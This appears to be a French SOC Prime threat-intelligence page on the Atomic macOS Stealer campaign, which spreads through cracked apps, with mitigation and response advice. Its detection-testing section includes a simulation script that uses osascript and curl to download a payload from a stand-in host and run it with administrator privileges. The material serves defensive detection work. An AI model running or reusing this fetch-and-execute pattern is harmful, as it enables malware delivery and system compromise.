SOC Prime Bias: Moyen

08 May 2026 15:45 UTC

Le voleur AMOS cible macOS via des applications « crackées »

Author Photo
SOC Prime Team linkedin icon Suivre
Le voleur AMOS cible macOS via des applications « crackées »
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Le rapport décrit une campagne distribuant Atomic macOS Stealer (AMOS) en le déguisant en applications piratées ou en instruisant les utilisateurs à exécuter des commandes de terminal copiées-collées. Une fois exécuté, le malware collecte un ensemble large de données sensibles, y compris des identifiants, des informations sur les navigateurs, des portefeuilles de cryptomonnaie, des fichiers d’applications de messagerie, des profils VPN et des documents personnels, puis exfiltre le contenu volé via HTTP ou HTTPS. Pour éviter la détection statique, les opérateurs changent de domaine et d’URLs tout au long de la campagne. L’activité vise les utilisateurs de macOS, en particulier ceux qui recherchent des logiciels non officiels ou piratés.

Investigation

La télémétrie Trend Vision One a été utilisée pour reconstruire toute la chaîne d’infection, débutant avec le téléchargement d’applications piratées depuis haxmac.cc, suivie d’une redirection via des domaines intermédiaires, l’exécution de scripts shell malveillants, la création de démons de lancement pour la persistance, la préparation des données dans /tmp, la compression des données dans des archives ZIP, et l’exfiltration vers des domaines contrôlés par les attaquants avec rotation. Les chercheurs ont capturé les lignes de commande pertinentes, les chemins de fichier et les indicateurs comportementaux associés à chaque étape de la compromission.

Atténuation

Les organisations devraient informer les utilisateurs des risques liés aux logiciels piratés et aux commandes de terminal copiées-collées, appliquer les contrôles Gatekeeper et de notarisation, et limiter l’exécution inutile de scripts sur les systèmes macOS. Les défenseurs devraient également surveiller les activités suspectes de curl and osascript et bloquer l’accès aux domaines et adresses IP malveillants connus. Les détections sur les points finaux devraient se concentrer sur la création non autorisée de démons de lancement, le placement de fichiers cachés, et un comportement inhabituel de collecte ou d’exfiltration de fichiers.

Réponse

Si une activité AMOS est détectée, isoler le point final affecté, terminer les processus malveillants, supprimer les fichiers cachés tels que .helper, .agent, et com.finder.helper.plist, et supprimer toutes les données mises en scène pour l’exfiltration. Les identifiants compromis devraient être révoqués et une analyse médico-légale devrait être réalisée sur toutes les archives récupérées. L’infrastructure malveillante identifiée devrait être bloquée, et le contenu de détection devrait être mis à jour pour surveiller les motifs de commande observés.

Flux d’attaque

Exécution de Simulation

Condition préalable : Le contrôle préalable de la télémétrie et de la ligne de base doit avoir réussi.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et la narration DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à une mauvaise interprétation.

  • Narratif de l’attaque & Commandes :
    Un adversaire a obtenu un leurre de phishing qui livre une charge utile AppleScript courte. Le script utilise osascript pour exécuter une commande shell (sh -c) qui invoque curl pour télécharger le binaire AMOS stealer depuis un serveur C2 malveillant, le stocke dans le ~/Library/Application Support/ dossier de l’utilisateur, et l’exécute ensuite avec des privilèges élevés. L’utilisation de osascript (un binaire Apple signé) masque l’activité en tant qu’automatisation légitime, tandis que curl assure un téléchargement réseau discret.

  • Script de test de régression :

    # amos_stealer_simulation.sh
    # Simuler l'exécution d'AMOS stealer sur macOS utilisant osascript + curl
    
    # 1. Définir l'URL malveillante (utiliser un emplacement inoffensif pour la sécurité)
    MALICIOUS_URL="https://example.com/malicious_payload.sh"
    
    # 2. AppleScript qui exécute une commande shell pour télécharger & exécuter la charge utile
    APPLESCRIPT=$(cat <<'EOF'
    do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges
    EOF
    )
    
    # 3. Exécuter l'AppleScript via osascript
    echo "$APPLESCRIPT" | osascript
    
    # 4. Pause brève pour permettre à la charge utile de s'exécuter
    sleep 5
  • Commandes de nettoyage :

    # cleanup_amos_simulation.sh
    # Supprimer les artefacts créés par la simulation
    
    # Supprimer la charge utile téléchargée
    rm -f /tmp/payload.sh
    
    # Révoquer les processus élevés temporaires (si encore en cours)
    pkill -f "/tmp/payload.sh" || true
    
    # Facultativement, effacer l'historique d'exécution d'AppleScript
    # (macOS ne conserve pas un historique persistant pour osascript)
    echo "Nettoyage terminé."